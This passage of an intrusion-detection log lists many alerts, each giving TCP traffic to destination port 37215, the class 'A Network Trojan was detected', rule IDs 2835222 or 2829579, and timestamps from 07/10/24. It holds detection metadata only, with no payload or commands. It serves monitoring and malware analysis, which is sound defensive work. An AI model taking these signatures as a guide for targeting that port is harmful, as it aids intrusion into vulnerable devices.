                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.443161
                  SID:2835222
                  Source Port:54182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.823604
                  SID:2829579
                  Source Port:44304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909155
                  SID:2835222
                  Source Port:55860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064237
                  SID:2835222
                  Source Port:34916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.005959
                  SID:2829579
                  Source Port:48558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2835222
                  Source Port:52386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2835222
                  Source Port:54878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.493980
                  SID:2829579
                  Source Port:35202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.492988
                  SID:2835222
                  Source Port:52888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.651509
                  SID:2829579
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994858
                  SID:2829579
                  Source Port:56028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.851578
                  SID:2829579
                  Source Port:56214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.842336
                  SID:2829579
                  Source Port:44666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865384
                  SID:2835222
                  Source Port:51362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.402218
                  SID:2835222
                  Source Port:44362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.617862
                  SID:2829579
                  Source Port:41870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825232
                  SID:2829579
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047085
                  SID:2835222
                  Source Port:38118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.173254
                  SID:2835222
                  Source Port:42408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.968872
                  SID:2835222
                  Source Port:50180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.035789
                  SID:2829579
                  Source Port:55566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.515287
                  SID:2835222
                  Source Port:57070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.436207
                  SID:2829579
                  Source Port:41784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.146093
                  SID:2829579
                  Source Port:39616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.918305
                  SID:2835222
                  Source Port:50220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.540187
                  SID:2829579
                  Source Port:37424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.862635
                  SID:2829579
                  Source Port:34058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.836491
                  SID:2829579
                  Source Port:36594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005149
                  SID:2835222
                  Source Port:39914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430208
                  SID:2835222
                  Source Port:43092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.469878
                  SID:2829579
                  Source Port:44820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.244914
                  SID:2835222
                  Source Port:60316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.689039
                  SID:2829579
                  Source Port:55496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.911727
                  SID:2835222
                  Source Port:35868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.617317
                  SID:2829579
                  Source Port:40802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.938789
                  SID:2835222
                  Source Port:39672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.104096
                  SID:2835222
                  Source Port:49720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.696239
                  SID:2835222
                  Source Port:50918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.775656
                  SID:2835222
                  Source Port:54220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819720
                  SID:2835222
                  Source Port:38838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.860909
                  SID:2835222
                  Source Port:35782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.345692
                  SID:2835222
                  Source Port:33620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.646221
                  SID:2835222
                  Source Port:59730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879798
                  SID:2829579
                  Source Port:36038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.813541
                  SID:2829579
                  Source Port:52692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.814052
                  SID:2835222
                  Source Port:36122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.854243
                  SID:2829579
                  Source Port:44668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.913134
                  SID:2829579
                  Source Port:34190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609289
                  SID:2829579
                  Source Port:34916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2829579
                  Source Port:38828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.734859
                  SID:2829579
                  Source Port:35928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2835222
                  Source Port:38456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.414315
                  SID:2829579
                  Source Port:51814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.341806
                  SID:2835222
                  Source Port:58258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897517
                  SID:2835222
                  Source Port:55844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.665710
                  SID:2829579
                  Source Port:32986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099598
                  SID:2835222
                  Source Port:49710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.838823
                  SID:2829579
                  Source Port:52166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828221
                  SID:2835222
                  Source Port:46932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222070
                  SID:2835222
                  Source Port:38100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328619
                  SID:2829579
                  Source Port:37174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.193808
                  SID:2829579
                  Source Port:35812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.573504
                  SID:2835222
                  Source Port:38868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.534381
                  SID:2835222
                  Source Port:47970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361237
                  SID:2835222
                  Source Port:49168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.072701
                  SID:2835222
                  Source Port:48680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583882
                  SID:2829579
                  Source Port:51468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.967998
                  SID:2829579
                  Source Port:46020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810849
                  SID:2829579
                  Source Port:57440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.524058
                  SID:2835222
                  Source Port:48230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.610519
                  SID:2835222
                  Source Port:34286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853545
                  SID:2829579
                  Source Port:47980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.989466
                  SID:2835222
                  Source Port:41680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.814052
                  SID:2829579
                  Source Port:36076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.914559
                  SID:2835222
                  Source Port:44736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.239368
                  SID:2829579
                  Source Port:39892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.741388
                  SID:2835222
                  Source Port:56636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.879132
                  SID:2835222
                  Source Port:53182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.367080
                  SID:2829579
                  Source Port:43174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.366312
                  SID:2835222
                  Source Port:44188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912225
                  SID:2835222
                  Source Port:45118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.743244
                  SID:2829579
                  Source Port:44762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.893225
                  SID:2835222
                  Source Port:57598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139663
                  SID:2829579
                  Source Port:45046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.812125
                  SID:2829579
                  Source Port:37968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2829579
                  Source Port:47708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.641712
                  SID:2829579
                  Source Port:39758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.713774
                  SID:2835222
                  Source Port:54556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777046
                  SID:2835222
                  Source Port:36066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647124
                  SID:2829579
                  Source Port:43922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.499663
                  SID:2835222
                  Source Port:38340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651125
                  SID:2835222
                  Source Port:34940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.644111
                  SID:2829579
                  Source Port:52416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.074036
                  SID:2829579
                  Source Port:36874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.978919
                  SID:2829579
                  Source Port:34790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.029902
                  SID:2829579
                  Source Port:52336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.490419
                  SID:2829579
                  Source Port:35996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.447281
                  SID:2835222
                  Source Port:59866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.478959
                  SID:2835222
                  Source Port:47896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510691
                  SID:2829579
                  Source Port:44016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.792131
                  SID:2829579
                  Source Port:43174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063250
                  SID:2835222
                  Source Port:53574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251804
                  SID:2835222
                  Source Port:60268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.035862
                  SID:2835222
                  Source Port:47836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.719591
                  SID:2835222
                  Source Port:35240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.837322
                  SID:2829579
                  Source Port:36854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.800658
                  SID:2829579
                  Source Port:53280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.507249
                  SID:2829579
                  Source Port:41670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.071295
                  SID:2829579
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.885444
                  SID:2835222
                  Source Port:41406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.429135
                  SID:2829579
                  Source Port:49128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.483728
                  SID:2829579
                  Source Port:50090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.018134
                  SID:2835222
                  Source Port:45544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.619838
                  SID:2835222
                  Source Port:49224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.627693
                  SID:2835222
                  Source Port:59814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.528508
                  SID:2835222
                  Source Port:53148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.557067
                  SID:2829579
                  Source Port:50034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.810736
                  SID:2829579
                  Source Port:60188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.018737
                  SID:2829579
                  Source Port:39930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.344618
                  SID:2835222
                  Source Port:45286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.835457
                  SID:2829579
                  Source Port:54432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624887
                  SID:2829579
                  Source Port:48044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.526771
                  SID:2835222
                  Source Port:51840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.312815
                  SID:2835222
                  Source Port:41058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2829579
                  Source Port:46770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.624823
                  SID:2835222
                  Source Port:43206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2835222
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.363074
                  SID:2835222
                  Source Port:52046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.468453
                  SID:2835222
                  Source Port:45898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841880
                  SID:2829579
                  Source Port:39308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.863602
                  SID:2835222
                  Source Port:43416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885760
                  SID:2829579
                  Source Port:46276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.547528
                  SID:2835222
                  Source Port:51728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.904086
                  SID:2835222
                  Source Port:42146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.617783
                  SID:2835222
                  Source Port:54718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.053568
                  SID:2835222
                  Source Port:36152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.911247
                  SID:2829579
                  Source Port:36508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381629
                  SID:2829579
                  Source Port:57088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903696
                  SID:2835222
                  Source Port:44166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.950473
                  SID:2835222
                  Source Port:49992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2829579
                  Source Port:52558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384397
                  SID:2829579
                  Source Port:35796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.530155
                  SID:2829579
                  Source Port:47416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744458
                  SID:2829579
                  Source Port:52634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.214237
                  SID:2835222
                  Source Port:51016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.256237
                  SID:2835222
                  Source Port:56620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350374
                  SID:2829579
                  Source Port:35970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002709
                  SID:2829579
                  Source Port:45550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.093186
                  SID:2829579
                  Source Port:34198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.234454
                  SID:2835222
                  Source Port:47338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.866778
                  SID:2829579
                  Source Port:58732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.264722
                  SID:2835222
                  Source Port:49404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.922167
                  SID:2829579
                  Source Port:51642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.969982
                  SID:2829579
                  Source Port:33134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026878
                  SID:2829579
                  Source Port:53950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771626
                  SID:2829579
                  Source Port:55726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453376
                  SID:2829579
                  Source Port:54160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.078172
                  SID:2835222
                  Source Port:39956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.581630
                  SID:2835222
                  Source Port:45626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771791
                  SID:2835222
                  Source Port:44630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868387
                  SID:2829579
                  Source Port:60146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348963
                  SID:2835222
                  Source Port:47282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.873311
                  SID:2835222
                  Source Port:38938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.883377
                  SID:2835222
                  Source Port:40522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.366132
                  SID:2829579
                  Source Port:51534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107652
                  SID:2835222
                  Source Port:58506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.494208
                  SID:2835222
                  Source Port:36364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.102035
                  SID:2835222
                  Source Port:56690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366759
                  SID:2829579
                  Source Port:41368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.686618
                  SID:2829579
                  Source Port:45648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156577
                  SID:2835222
                  Source Port:60172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.981155
                  SID:2829579
                  Source Port:55830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905165
                  SID:2835222
                  Source Port:46700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253247
                  SID:2835222
                  Source Port:38898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.561465
                  SID:2829579
                  Source Port:46582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.322147
                  SID:2829579
                  Source Port:57144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2829579
                  Source Port:40166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.928138
                  SID:2829579
                  Source Port:32774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623181
                  SID:2835222
                  Source Port:57868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.845795
                  SID:2835222
                  Source Port:40044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941431
                  SID:2835222
                  Source Port:56096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.028986
                  SID:2835222
                  Source Port:37204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.849175
                  SID:2835222
